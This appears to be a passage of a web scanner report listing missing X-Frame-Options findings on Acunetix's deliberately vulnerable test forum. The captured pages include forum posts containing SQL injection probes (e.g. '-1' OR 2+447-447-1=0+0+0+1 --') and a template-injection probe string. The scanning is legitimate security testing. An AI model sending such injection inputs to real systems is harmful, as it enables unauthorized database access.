type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4230 |
Response Body - size: 4,230 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%> - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=70 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4146 |
Response Body - size: 4,146 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:19 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2<(0+5+689-689)</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=71 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4146 |
Response Body - size: 4,146 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1 OR 3*2>(0+5+689-689)</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=72 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 2+447-447-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=73 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:21 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3+447-447-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=74 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4151 |
Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:22 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2<(0+5+447-447) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=75 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4151 |
Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:38 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2>(0+5+447-447) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple 